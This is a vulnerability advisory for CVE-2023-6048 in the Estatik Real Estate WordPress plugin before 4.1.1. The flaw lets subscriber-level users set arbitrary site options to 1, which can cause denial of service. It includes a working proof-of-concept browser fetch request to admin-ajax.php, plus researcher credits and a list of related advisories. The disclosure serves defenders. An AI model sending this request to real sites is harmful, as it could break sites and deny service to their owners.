Estatik Real Estate Plugin < 4.1.1 – Subscriber+ Arbitrary Option Update | CVE 2023-6048 | Plugin Vulnerabilities

Description

The plugin does not prevent user with low privileges on the site, like subscribers, from setting any of the site's options to 1, which could be used to break sites and lead to DoS when certain options are reset

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as a subscriber user:

fetch("/wp-admin/admin-ajax.php?action=es_dismiss_notices", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
   },
  "body": "notice=template",
  "method": "POST",
});

Affects Plugins

Fixed in 4.1.1

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając (CERT PL)

Submitter

Krzysztof Zając (CERT PL)

Submitter website

https://cert.pl

Submitter twitter

Verified

Yes

WPVDB ID

74cb07fe-fc82-472f-8c52-859c176d9e51

Timeline

Publicly Published

2023-12-25 (about 2 years ago)

Added

2023-12-25 (about 2 years ago)

Last Updated

2023-12-25 (about 2 years ago)

Other

Published

Title

Published

2024-10-25

Title

Token Login <= 1.0.3 - Authenticated (Subscriber+) Privilege Escalation

Published

2024-12-11

Title

de:branding <= 1.0.2 - Authenticated (Subscriber+) Arbitrary Options Update

Published

2025-05-16

Title

CSS3 Tooltips for WordPress <= 1.8 - Missing Authorization

Published

2024-12-02

Title

IdeaPush < 8.72 - Missing Authorization to Board Term Deletion

Published

2025-07-07

Title

Multi-language Responsive Contact Form <= 2.8 - Missing Authorization